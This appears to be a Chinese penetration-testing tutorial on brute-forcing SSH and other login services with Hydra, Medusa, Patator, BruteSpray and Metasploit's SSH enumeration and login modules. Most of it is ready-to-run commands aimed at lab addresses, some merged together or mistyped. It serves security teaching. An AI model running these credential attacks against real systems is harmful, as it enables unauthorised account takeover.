一.hydra【海德拉】
海德拉(Hydra):希腊神话中的九头蛇,是西方的神话生物,在古希腊神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。
Hydra是世界顶级密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
1.指定用户破解:
hydea -l user -P passlist.txt ftp://192.168.0.1hydra -L userlist.txt -p defaultpw imap://192.1680.0/PLAINhydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5hydra -l admin -p password ftp://[192.168.0.0/24]/hydra -L logins.txt -p pws.txt -M targets.txt sshhydra -l root -P pass.list 192.168.75.158 ssh
2.用户列表破解:
hydra -L userlist.txt -P passlist.txt 192.168.75.158 sshhydra -L userlist.txt -P passlist.txt -M hostlist.txt sshhydra -l root -P pass.list 192.168.75.158 ssh -o hydrassh.txt
二.medusa[美杜莎]
美杜莎是希腊神话里的一个女妖怪,她的头发是毒蛇,长的青面獠牙,她知道自丑,她要报复,她把见过她的人都变成了石头。据说她原是一位美丽的少女,之所以变成蛇发女妖是因为梅杜莎和智慧女神雅典娜比美,雅典娜一怒之下将梅杜莎的头发变成毒蛇,变成面目丑陋的怪物。
Medusa[美杜莎]是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机、用户或密码执行强力测试。Medusa和Hydra一样,同样于在线密码破解工具。不同的是,Medusa的稳定性相较于Hydra要好很多,但其支持模块要比Hydra少一些。
Medusa [ -h host | -H file] [ -u username | -U file] [-p password | -p file ] [ -C file ]
medusa -M ssh -u root -P pass.list -h 192.168.75.158
medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt
medusa -M ssh -u root -P pass.list -h 192.168.75.158 -O medusa.txt
三.Patator强大的命令行暴力破解器
查看模块: #patator
查看模块具体用法:#patator --ssh_login --help
#patator ssh_login host=192.168.75.158 user=root password=FILE0 0=passlist.txt
#patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list
#patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list -x ignore:mesg=‘Authentication failed.’
四.BrutesPray
BrutesPray是一款基于nmap扫描输出的gnmap/XML文件。自动调用Medusa对服务进行爆破。
1.安装brutespray
#apt-get update
#apt-get install brutespray
2.语法参数:
3.Nmap扫描常用命令
4.对SSH密码进行爆破
#nmap -sV -p 22 192.168.75.0/24 -oX nmaplive.xml#brutespray --file nmaplive.xml -u root -P pass.list -c#cat /root/brutespray-output/22-ssh-success.txt 查看爆破成功的文件内容
五.Metasploit Framework
Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。
#msfconsole
msf > search ssh
1.MSF枚举(找用户)
msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > show options msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.75.158 设置目标主机msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file /root/user.listmsf auxiliary(scanner/ssh/ssh_enumusers) > set threads 10msf auxiliary(scanner/ssh/ssh_enumusers) > show optionsmsf auxiliary(scanner/ssh/ssh_enumusers) > run
2.MSF版本探测
msf > use auxiliary/scanner/ssh/ssh_versionmsf auxiliary(scanner/ssh/ssh_version) > show optionsmsf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.75.158msf auxiliary(scanner/ssh/ssh_version) > show optionsmsf auxiliary(scanner/ssh/ssh_version) > run
3.MSF暴力破解
msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_loginmsf auxiliary(scanner/ssh/ssh_login) > show optionsmsf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.75.158msf auxiliary(scanner/ssh/ssh_login) > set pass_file /root/pass.listmsf auxiliary(scanner/ssh/ssh_login) > set user_file /root/user.listmsf auxiliary(scanner/ssh/ssh_login) > run
